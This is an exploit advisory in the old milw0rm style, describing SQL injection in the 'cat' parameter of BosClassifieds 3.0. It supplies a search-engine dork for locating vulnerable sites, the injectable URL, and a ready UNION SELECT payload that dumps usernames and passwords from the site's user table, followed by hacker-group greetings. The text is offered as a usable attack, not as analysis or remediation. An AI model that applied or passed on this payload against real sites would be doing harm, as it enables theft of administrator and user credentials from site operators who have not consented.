BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability :

Date : 2008-04-14 Author : SoSo H H
##############################################################################
##                                  !R4Q!4N H4CK3R
##
##  BosClassifieds 3.0 Remote Sql injection Exploit
##
##  By:SoSo H H(Iraqi-Cracker)
##
##  Script website:http://www.bosdev.com
##
##  Dork:"Powered by BosClassifieds Classified Ads System"
##
##############################################################################
## Affected Versoions:
## 
## BosClassifieds 3.0 ( Other Versions Maybe Affected, Not Sure  :)  )
##
##############################################################################
##
## Expl0it:
##
## site.c0m/bosclassifieds/index.php?cat=[SQL]
##
## Example:
##
## SQL:-666 union select 1,2,concat(username,password)from bosdevUUS/*
##
##############################################################################
## Greetz:My Sweet :X,El Mariachi,L!0N,-=Mizo=-,Shadow Administrator
##       Mini-Spider,and all My Friends.
##
##############################################################################

# milw0rm.com [2008-04-14]

C1

 

C2

 

C3